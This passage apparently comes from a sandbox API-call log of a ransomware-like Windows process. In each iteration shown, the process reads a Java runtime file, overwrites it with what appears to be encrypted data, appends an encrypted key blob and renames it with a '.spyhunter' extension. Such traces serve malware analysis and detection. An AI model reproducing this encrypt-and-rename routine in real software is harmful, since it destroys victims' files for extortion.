lpOverlapped=0x0) returned 1 [0127.195] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.195] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf6e4*=0x2800, lpOverlapped=0x0) returned 1 [0127.195] GetProcessHeap () returned 0x2c0000 [0127.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.195] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.195] WriteFile (in: hFile=0x170, lpBuffer=0x25cf724*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf724*, lpNumberOfBytesWritten=0x25cf6e4*=0x4, lpOverlapped=0x0) returned 1 [0127.270] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6e4*=0x30, lpOverlapped=0x0) returned 1 [0127.271] CloseHandle (hObject=0x170) returned 1 [0127.271] GetProcessHeap () returned 0x2c0000 [0127.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f067d8 [0127.271] wnsprintfW (in: pszDest=0x2f067d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf.spyhunter") returned 79 [0127.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightitalic.ttf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightItalic.ttf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightitalic.ttf.spyhunter")) returned 1 [0127.272] GetProcessHeap () returned 0x2c0000 [0127.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f067d8 | out: hHeap=0x2c0000) returned 1 [0127.272] GetProcessHeap () returned 0x2c0000 [0127.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.272] GetProcessHeap () returned 0x2c0000 [0127.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ccd8 | out: hHeap=0x2c0000) returned 1 [0127.272] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf728 | out: pbBuffer=0x25cf728) returned 1 [0127.272] GetProcessHeap () returned 0x2c0000 [0127.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.272] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf720*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf720*=0x30) returned 1 [0127.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mexico_city"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City") returned 63 [0127.447] StrStrW (lpFirst="Mexico_City", lpSrch=".txt") returned 0x0 [0127.447] GetProcessHeap () returned 0x2c0000 [0127.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0127.447] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf6e4*=0x370, lpOverlapped=0x0) returned 1 [0127.461] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffc90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.461] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x25cf6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf6e4*=0x370, lpOverlapped=0x0) returned 1 [0127.461] GetProcessHeap () returned 0x2c0000 [0127.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0127.462] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.462] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf724*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf724*, lpNumberOfBytesWritten=0x25cf6e4*=0x4, lpOverlapped=0x0) returned 1 [0127.462] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6e4*=0x30, lpOverlapped=0x0) returned 1 [0127.462] CloseHandle (hObject=0x17c) returned 1 [0127.462] GetProcessHeap () returned 0x2c0000 [0127.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.462] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City.spyhunter") returned 73 [0127.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mexico_city"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mexico_city.spyhunter")) returned 1 [0127.463] GetProcessHeap () returned 0x2c0000 [0127.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.463] GetProcessHeap () returned 0x2c0000 [0127.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.464] GetProcessHeap () returned 0x2c0000 [0127.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4b28 | out: hHeap=0x2c0000) returned 1 [0127.464] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf720 | out: pbBuffer=0x25cf720) returned 1 [0127.464] GetProcessHeap () returned 0x2c0000 [0127.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.464] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf718*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf718*=0x30) returned 1 [0127.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\winnipeg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.465] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg") returned 60 [0127.465] StrStrW (lpFirst="Winnipeg", lpSrch=".txt") returned 0x0 [0127.465] GetProcessHeap () returned 0x2c0000 [0127.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0127.465] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf6dc*=0x618, lpOverlapped=0x0) returned 1 [0127.479] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff9e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.480] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x25cf6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf6dc*=0x618, lpOverlapped=0x0) returned 1 [0127.480] GetProcessHeap () returned 0x2c0000 [0127.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0127.480] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.480] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf71c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf71c*, lpNumberOfBytesWritten=0x25cf6dc*=0x4, lpOverlapped=0x0) returned 1 [0127.480] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6dc*=0x30, lpOverlapped=0x0) returned 1 [0127.480] CloseHandle (hObject=0x17c) returned 1 [0127.480] GetProcessHeap () returned 0x2c0000 [0127.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.481] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg.spyhunter") returned 70 [0127.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\winnipeg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\winnipeg.spyhunter")) returned 1 [0127.481] GetProcessHeap () returned 0x2c0000 [0127.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.482] GetProcessHeap () returned 0x2c0000 [0127.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.482] GetProcessHeap () returned 0x2c0000 [0127.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba818 | out: hHeap=0x2c0000) returned 1 [0127.482] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf720 | out: pbBuffer=0x25cf720) returned 1 [0127.482] GetProcessHeap () returned 0x2c0000 [0127.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.482] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf718*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf718*=0x30) returned 1 [0127.482] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tortola"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.483] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola") returned 59 [0127.483] StrStrW (lpFirst="Tortola", lpSrch=".txt") returned 0x0 [0127.483] GetProcessHeap () returned 0x2c0000 [0127.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0127.483] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf6dc*=0x41, lpOverlapped=0x0) returned 1 [0127.484] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.484] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf6dc*=0x41, lpOverlapped=0x0) returned 1 [0127.484] GetProcessHeap () returned 0x2c0000 [0127.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0127.485] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.485] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf71c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf71c*, lpNumberOfBytesWritten=0x25cf6dc*=0x4, lpOverlapped=0x0) returned 1 [0127.485] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6dc*=0x30, lpOverlapped=0x0) returned 1 [0127.485] CloseHandle (hObject=0x17c) returned 1 [0127.485] GetProcessHeap () returned 0x2c0000 [0127.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.485] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola.spyhunter") returned 69 [0127.485] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tortola"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tortola.spyhunter")) returned 1 [0127.486] GetProcessHeap () returned 0x2c0000 [0127.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.486] GetProcessHeap () returned 0x2c0000 [0127.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.486] GetProcessHeap () returned 0x2c0000 [0127.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9ac0 | out: hHeap=0x2c0000) returned 1 [0127.486] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf718 | out: pbBuffer=0x25cf718) returned 1 [0127.486] GetProcessHeap () returned 0x2c0000 [0127.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.486] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf710*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf710*=0x30) returned 1 [0127.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\toronto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.487] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto") returned 59 [0127.487] StrStrW (lpFirst="Toronto", lpSrch=".txt") returned 0x0 [0127.487] GetProcessHeap () returned 0x2c0000 [0127.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0127.487] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf6d4*=0x788, lpOverlapped=0x0) returned 1 [0127.671] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff878, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.671] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x788, lpNumberOfBytesWritten=0x25cf6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf6d4*=0x788, lpOverlapped=0x0) returned 1 [0127.672] GetProcessHeap () returned 0x2c0000 [0127.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0127.672] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.672] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf714*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf714*, lpNumberOfBytesWritten=0x25cf6d4*=0x4, lpOverlapped=0x0) returned 1 [0127.672] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6d4*=0x30, lpOverlapped=0x0) returned 1 [0127.672] CloseHandle (hObject=0x17c) returned 1 [0127.672] GetProcessHeap () returned 0x2c0000 [0127.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.672] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto.spyhunter") returned 69 [0127.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\toronto"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\toronto.spyhunter")) returned 1 [0127.673] GetProcessHeap () returned 0x2c0000 [0127.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.673] GetProcessHeap () returned 0x2c0000 [0127.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.673] GetProcessHeap () returned 0x2c0000 [0127.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9a00 | out: hHeap=0x2c0000) returned 1 [0127.673] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf718 | out: pbBuffer=0x25cf718) returned 1 [0127.673] GetProcessHeap () returned 0x2c0000 [0127.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.674] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf710*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf710*=0x30) returned 1 [0127.674] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yakutsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.863] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk") returned 56 [0127.863] StrStrW (lpFirst="Yakutsk", lpSrch=".txt") returned 0x0 [0127.863] GetProcessHeap () returned 0x2c0000 [0127.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.863] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf6d4*=0x245, lpOverlapped=0x0) returned 1 [0127.867] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.868] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x25cf6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf6d4*=0x245, lpOverlapped=0x0) returned 1 [0127.868] GetProcessHeap () returned 0x2c0000 [0127.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.868] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.868] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf714*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf714*, lpNumberOfBytesWritten=0x25cf6d4*=0x4, lpOverlapped=0x0) returned 1 [0127.868] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6d4*=0x30, lpOverlapped=0x0) returned 1 [0127.868] CloseHandle (hObject=0x17c) returned 1 [0127.868] GetProcessHeap () returned 0x2c0000 [0127.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.868] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk.spyhunter") returned 66 [0127.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yakutsk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yakutsk.spyhunter")) returned 1 [0127.905] GetProcessHeap () returned 0x2c0000 [0127.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.905] GetProcessHeap () returned 0x2c0000 [0127.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.905] GetProcessHeap () returned 0x2c0000 [0127.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd880 | out: hHeap=0x2c0000) returned 1 [0127.905] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf710 | out: pbBuffer=0x25cf710) returned 1 [0127.905] GetProcessHeap () returned 0x2c0000 [0127.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.906] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf708*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf708*=0x30) returned 1 [0127.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\hst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.906] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST") returned 47 [0127.906] StrStrW (lpFirst="HST", lpSrch=".txt") returned 0x0 [0127.906] GetProcessHeap () returned 0x2c0000 [0127.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.906] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf6cc*=0x1b, lpOverlapped=0x0) returned 1 [0127.907] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.907] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25cf6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf6cc*=0x1b, lpOverlapped=0x0) returned 1 [0127.907] GetProcessHeap () returned 0x2c0000 [0127.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.907] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.907] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf70c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf70c*, lpNumberOfBytesWritten=0x25cf6cc*=0x4, lpOverlapped=0x0) returned 1 [0127.907] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6cc*=0x30, lpOverlapped=0x0) returned 1 [0127.907] CloseHandle (hObject=0x17c) returned 1 [0127.907] GetProcessHeap () returned 0x2c0000 [0127.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.907] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST.spyhunter") returned 57 [0127.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files 